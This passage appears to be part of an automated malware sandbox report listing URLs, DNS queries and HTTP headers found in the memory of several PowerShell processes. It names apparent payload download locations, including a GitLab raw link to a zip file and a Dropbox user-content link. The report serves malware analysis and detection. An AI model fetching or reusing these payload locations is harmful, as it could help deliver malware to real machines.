wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: t-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com
              Source: global trafficDNS traffic detected: DNS query: gitlab.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Nov 2024 07:47:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 8200Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BAA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C910E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C9251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC79C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD601E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD6161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D4F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1ED04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6B90A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC5FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1D341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA70E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
              Source: powershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micrSystem.resourcesA_2009-04-02.crt0
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6B90A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC5FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1D341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
              Source: powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
              Source: powershell.exe, 00000010.00000002.2382462525.0000022E1D571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC7309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com(
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
              Source: powershell.exe, 0000000E.00000002.2295832039.0000015FC412A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2361414263.0000015FDE120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/users/sign_in
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6B9CD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC6BE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1DF71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BAA6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C910E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252831478.000001D6C9251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC79C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD601E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2353648161.0000015FD6161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D4F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2382462525.0000022E1ED04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2464066818.0000022E2D3AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
              Source: powershell.exe, 0000000E.00000002.2298327925.0000015FC75F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2298327925.0000015FC75D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf1b725e67a1bbd002a86ad32fd.dl.dropboxusercontent.com/cd/0/get/Cel62Zb6Z6skuFAMIcLW6_-9x9nN
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6B9CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
              Source: powershell.exe, 0000000C.00000002.2237505054.000001D6BA6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2237505054.000001D6BA6EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
